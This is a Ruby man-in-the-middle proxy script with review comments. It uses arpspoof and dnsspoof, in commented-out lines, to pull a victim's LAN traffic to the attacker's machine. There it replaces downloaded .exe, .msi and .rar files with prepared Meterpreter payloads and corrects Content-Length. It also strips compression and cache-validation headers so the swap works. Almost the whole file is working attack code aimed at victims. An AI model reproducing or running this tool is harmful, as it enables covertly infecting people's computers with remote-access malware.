#usage:  sudo ruby proxy.rb <port>        e.g.  sudo ruby proxy.rb 666
#root is only needed to bind a privileged port (80 -- which the dnsspoof redirection
#below requires, since victims' browsers connect to attacker_ip on the default HTTP
#port) and for the raw sockets arpspoof/dnsspoof use; on a high port it runs unprivileged.
require 'eventmachine' # third-party dependency: gem install eventmachine
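# ---- configuration ---------------------------------------------------------
# Listening port, taken from the command line and validated up front so a
# missing/garbage argument fails here instead of inside the reactor.  Use 80
# when victims are steered here by the dnsspoof entries below: their browsers
# connect to attacker_ip on the default HTTP port, nothing redirects them
# to another port.
port_arg = ARGV[0].to_s
abort("usage: sudo ruby proxy.rb <port>   e.g. sudo ruby proxy.rb 666") unless port_arg =~ /\A\d+\z/
prox_port = port_arg.to_i
abort("port must be 1-65535, got #{prox_port}") unless prox_port.between?(1, 65_535)

# Address the proxy binds to and that dnsspoof hands out to the victim.  This
# is the LAN address of the machine running this script, NOT 127.0.0.1.
attacker_ip = "192.168.0.2"

# Base path of the prepared payloads: /tmp/meterpreter.exe, .msi, .rar, ...
# A download is swapped only when the requested name ends in a supported
# extension AND a payload with that extension exists at this prefix.
# NOTE(review): Client looks the payload up under the literal "/tmp/meterpreter"
# prefix; editing this variable alone does not move the lookup.
meterpreter = "/tmp/meterpreter"

# dnsspoof hosts file: every name the victim asks for (*.*) resolves to us.
# Block-free File.write truncates and closes in one step (the original left
# the handle open between open and close).
File.write("dns.conf", "#{attacker_ip} *.*")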
# uncomment these lines to pull a victim's traffic here with arpspoof + dnsspoof (root
# required; set the interface, victim and gateway for your LAN).  dnsspoof answers every
# lookup with attacker_ip, so the victim's browser then connects to attacker_ip on
# port 80 -- start the proxy on port 80 for that redirection to reach it.
#victim="192.168.1.111"
#gateway="192.168.1.1"
#`pkill spoof`
#a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
#c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
#b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns.conf'"}
#a.run
#b.run
#c.run
Thread.start{
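# Upstream half of the proxy: one Client per intercepted request.  It replays
# the victim's request to the real server and relays the reply back through
# +other+ (the victim-facing EchoServer connection).  When the request asks
# for a .exe/.msi/.rar and the server labels its reply as a binary, the reply
# body is swapped for /tmp/meterpreter<ext> and Content-Length is corrected.
#
# NOTE(review): this class (and EchoServer) is defined inside a Thread.start
# block; the reactor started at the bottom of the file may reference them
# before that thread has run.  Defining them at top level is the safe form.
class Client < EM::Connection
  # Request-path suffixes we hold a payload for.  Only one of these literal
  # strings ever becomes part of the filesystem path below, so nothing in the
  # victim's request can steer the lookup (no traversal via a crafted name).
  PAYLOAD_EXTENSIONS = %w[.exe .rar .msi].freeze
  # Payloads live at "#{PAYLOAD_BASE}#{ext}", e.g. /tmp/meterpreter.exe
  PAYLOAD_BASE = "/tmp/meterpreter"
  # Content-Type values treated as "this reply is a downloadable binary".
  # (The original list had a typo, applictation/x-rar, that could never
  # match, and listed application/octet-stream twice, which made the old
  # per-trigger loop inject twice for that type.)
  BINARY_CONTENT_TYPES = %w[
    application/x-msdos-program
    application/x-msdownload
    application/octet-stream
    application/x-msi
    application/x-rar
    application/rar
  ].freeze
  # Header we must rewrite; anchored to a line start so the digits elsewhere
  # (e.g. the "200" in the status line) are never touched.
  CONTENT_LENGTH = /^Content-Length:[ \t]*\d+/i

  # @param other  [EM::Connection] victim-facing connection to relay to
  # @param finger [String] raw HTTP request bytes received from the victim
  def initialize(other, finger, *args, &blk)
    @other, @finger = other, finger
    super(*args, &blk)
  end

  # Send the request upstream and decide which payload extension, if any,
  # applies.  "Accept-Encoding" is deliberately misspelled on the way out so
  # the server answers uncompressed; a gzip body could not be replaced by a
  # plain byte swap.
  def post_init
    @injected = false
    send_data @finger.sub("Accept-Encoding:", "Assept-Ensoding:")
    @payload_extension = payload_extension_for(@finger)
  end

  # Relay one chunk of the upstream reply to the victim.  If the chunk holds
  # the status line/headers of an injectable download and the payload file
  # exists, the headers (with a corrected Content-Length) plus the payload are
  # sent INSTEAD of the chunk, and every further chunk of the real file is
  # discarded -- the original sent the injected reply and then the real one
  # after it, corrupting the stream.  Otherwise the chunk passes through.
  #
  # Assumes, like the original, that the status line and all headers arrive
  # in the first chunk; replies split earlier are passed through unmodified.
  def receive_data(response)
    return if @injected # remainder of the real file; the client already has the payload
    headers, = response.split("\r\n\r\n", 2)
    if injectable?(headers)
      path = PAYLOAD_BASE + @payload_extension
      if File.exist?(path)
        puts " injecting #{@payload_extension} SUCCESS"
        payload = File.binread(path) # bytes, not chars: Content-Length is a byte count
        @other.send_data headers.sub(CONTENT_LENGTH, "Content-Length: #{payload.bytesize}") + "\r\n\r\n" + payload
        @injected = true
        return
      end
      puts "payload does not exist? meterpreter#{@payload_extension} sending unmodified data"
    end
    @other.send_data response
  end

  private

  # The first entry of PAYLOAD_EXTENSIONS that ends the request-target on the
  # request line (case-insensitive; "?query" or "#frag" may follow), or "".
  # Only the request line is inspected, so a Referer or cookie containing
  # ".exe" does not make an unrelated download injectable.  (The original
  # scanned the whole request with an unescaped "." and relied on Ruby 1.8's
  # Array#to_s, which on 1.9+ made the check match everything.)
  def payload_extension_for(request)
    request_line = request.lines.first.to_s
    PAYLOAD_EXTENSIONS.find { |ext| request_line =~ /#{Regexp.escape(ext)}(?=[?#\s]|\z)/i } || ""
  end

  # True when +headers+ (text before the first blank line of the reply chunk)
  # carry a Content-Length and a binary Content-Type, and the request named a
  # supported extension.  Only the header block is examined, so a MIME string
  # occurring inside a body does not trigger a swap.
  def injectable?(headers)
    return false if headers.nil? || @payload_extension.to_s.empty?
    return false unless headers =~ CONTENT_LENGTH
    BINARY_CONTENT_TYPES.any? { |ct| headers =~ /^Content-Type:[ \t]*#{Regexp.escape(ct)}/i }
  end
end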
#browser open to http://192.168.1.114
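# Victim-facing half of the proxy.  Mixed into every connection accepted by
# EventMachine.start_server; each chunk the victim sends is parsed for its
# Host header and replayed to that server through a Client, which relays
# (and possibly replaces) the answer.
module EchoServer
  # The Host request header; the capture is "host" or "host:port".
  # "\r?$" rather than "$" alone: Ruby's "$" does not match before a CR.
  HOST_HEADER = /^Host:[ \t]*([^\r\n]+?)[ \t]*\r?$/i

  # Handle one chunk of bytes from the victim's browser.
  #
  # @param finger [String] raw request bytes (headers plus any body so far);
  #   cookies and requested URLs could be logged from here
  def receive_data(finger)
    host, port = parse_host(finger)
    if host.nil?
      # No Host header: either the rest of a request whose headers already
      # went upstream (forward it) or garbage (drop the connection).  The
      # original raised TypeError here, which takes the whole reactor down.
      @upstream ? @upstream.send_data(finger) : close_connection
      return
    end
    # Defang the conditional-request headers so the origin cannot answer
    # "304 Not Modified" -- a full body is needed for the swap.  This does
    # nothing about a browser serving straight out of its own cache without
    # asking the server at all.
    data = finger.sub("If-None-Match:", "If-None-MutXX:").sub("If-Modified-Since:", "If-Modified-SXnce:")
    @upstream = EventMachine.connect(host, port, Client, self, data)
  end

  private

  # @return [Array] [host, port] from the Host header (port defaults to 80,
  #   so "Host: example.com:8080" no longer sends "example.com:8080" to DNS),
  #   or [nil, nil] when there is no Host header
  def parse_host(request)
    m = HOST_HEADER.match(request)
    return [nil, nil] unless m
    host, port = m[1].match(/\A(.+?)(?::(\d+))?\z/).captures
    [host, port ? port.to_i : 80]
  end
end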
}
# Run the reactor: accept victim connections on attacker_ip:prox_port and hand
# each one to EchoServer, which opens a Client to the real server.  This call
# blocks until the reactor is stopped (Ctrl-C).
# NOTE(review): EchoServer is defined inside the Thread.start block above; if
# the reactor reaches start_server before that thread has run, this raises
# NameError.  Defining the handlers at top level avoids the race.
EventMachine.run do
  EventMachine.start_server(attacker_ip, prox_port, EchoServer)
end